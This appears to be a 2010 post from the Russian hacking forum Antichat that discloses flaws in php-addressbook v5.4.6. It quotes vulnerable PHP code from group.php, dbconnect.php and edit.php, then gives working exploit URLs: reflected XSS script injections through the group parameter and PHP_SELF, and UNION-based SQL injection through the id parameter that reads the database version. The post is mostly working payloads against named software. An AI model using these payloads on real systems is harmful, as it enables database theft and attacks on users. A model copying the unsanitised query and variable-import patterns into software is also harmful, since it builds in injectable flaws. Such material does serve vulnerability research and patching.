|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
php-addressbook v5.4.6 - r276
http://sourceforge.net/projects/php-addressbook/
group.php
PHP код:
echo "<div class='msgbox'>Users added.<br /><i>Go to <a href='./?group=$group_name'>group page \"$group_name\"</a>.</i></div>";
...
<form accept-charset="utf-8" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
pXSS
http://localhost/addressbookv5.4.6/index.php?group=1<script>alert(121212)</script>
pXSS
mq=off
http://localhost/addressbookv5.4.6/group.php/>"><script>alert(121212)</script>
---------------------
include/dbconnect.php
PHP код:
$get_vars = array( 'id' );
foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = intval($_GET[$get_var]);
} elseif(isset($_POST[$get_var])) {
${$get_var} = intval($_POST[$get_var]);
} else {
${$get_var} = null;
}
}
echo $id, "<br />";
// Copy only used variables into global space.
$get_vars = array( 'searchstring', 'alphabet', 'group', 'resultnumber'
, 'submit', 'update', 'delete'
, 'new', 'add', 'remove', 'edit' );
foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = mysql_real_escape_string($_GET[$get_var], $db);
} elseif(isset($_POST[$get_var])) {
${$get_var} = mysql_real_escape_string($_POST[$get_var], $db);
} else {
${$get_var} = null;
}
}
...
// To run the script on systeme with "register_globals" disabled,
// import all variables in a bit secured way: Remove HTML Tags
foreach($_REQUEST as $key => $value)
{
// Allow all tags in headers and footers
if($key == "group_header" || $key == "group_footer"){
${$key} = $value;
// Handle arrays
} elseif(is_array($value)) {
foreach($value as $entry)
{
${$key}[] = strip_tags($entry);
}
// Handle the rest
} else {
// ${$key} = htmlspecialchars($value); --chatelao-20071121, doesn't work with Chinese Characters
${$key} = strip_tags($value);
}
// TBD: prevent SQL-Injection
}
...
// ------------------- Group query handling ------------------------
//
$select_groups = "SELECT groups.*
, parent_groups.group_name parent_name
, parent_groups.group_id parent_id
FROM $table_groups AS groups
LEFT JOIN $table_groups AS parent_groups
ON groups.group_parent_id = parent_groups.group_id";
group.php
PHP код:
// Open for Editing
else if($edit || $id)
{
if($edit) $id = $selected[0];
if(! $read_only)
{
$result = mysql_query("$select_groups WHERE groups.group_id=$id",$db);
SQL
http://localhost/addressbookv5.4.6/group.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9+--+
-------------------------
edit.php
PHP код:
else if($id)
{
if(! $read_only)
{
$result = mysql_query("SELECT * FROM $base_from_where AND $table.id=$id",$db);
SQL
http://localhost/addressbookv5.4.6/edit.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23+--+
Последний раз редактировалось nikp; 11.02.2010 в 22:02..
|